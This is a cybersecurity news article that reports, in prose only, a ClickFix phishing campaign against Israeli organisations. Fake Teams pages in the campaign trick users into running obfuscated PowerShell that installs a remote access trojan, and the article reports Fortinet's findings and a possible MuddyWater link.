Cybercriminals Exploit ClickFix Technique to Target Windows Systems and Execute PowerShell Commands

A sophisticated new attack campaign has emerged, targeting Israeli businesses and infrastructure sectors through a deceptive social engineering technique known as “ClickFix.” This method tricks users into executing malicious PowerShell commands on their Windows systems. The multi-stage attack chain begins with phishing emails disguised as invitations to educational webinars about handling wartime medical supplies, illustrating how threat actors exploit current regional tensions to enhance their social engineering effectiveness. The attack operates through a carefully orchestrated sequence that starts when victims click on embedded links in phishing emails, redirecting them to spoofed Microsoft Teams pages. These fake landing pages instruct users to perform a specific sequence of actions, which ultimately triggers the execution of a malicious PowerShell command that initiates the infection chain. Fortinet analysts identified this targeted intrusion campaign through their FortiMail Workspace Security team, revealing that the entire attack relies exclusively on PowerShell execution without requiring external executables.

The researchers discovered evidence of lateral movement and surveillance activity, along with potential overlaps with MuddyWater campaign tactics, although attribution remains inconclusive due to notable tactical differences from traditional MuddyWater operations. The initial payload contains a Base64-encoded PowerShell command obfuscated across three strings within the phishing site’s HTML code. Once concatenated and decoded, it produces a command that initiates the retrieval and execution of a secondary PowerShell script from the attacker’s infrastructure, establishing the foundation for the complete compromise of the target system. The attack employs sophisticated obfuscation techniques that demonstrate advanced technical capabilities. After the initial payload execution, the malware downloads two critical files: test.html, which contains a blob object with binary data encoded between special tag markers, and a secondary PowerShell script that reconstructs the final malicious payload. The script employs a unique decoding mechanism that splits binary-encoded chunks, converts them from binary to ASCII characters, and reassembles the result into executable PowerShell code. The final stage deploys a remote access trojan entirely through PowerShell, establishing persistent communication with the command and control server. 

Categories: Cybersecurity Threats, Social Engineering Attacks, Malware Delivery Techniques 

Tags: ClickFix, Social Engineering, Phishing, PowerShell, Malware, Obfuscation, Remote Access Trojan, Lateral Movement, Infrastructure, Cybersecurity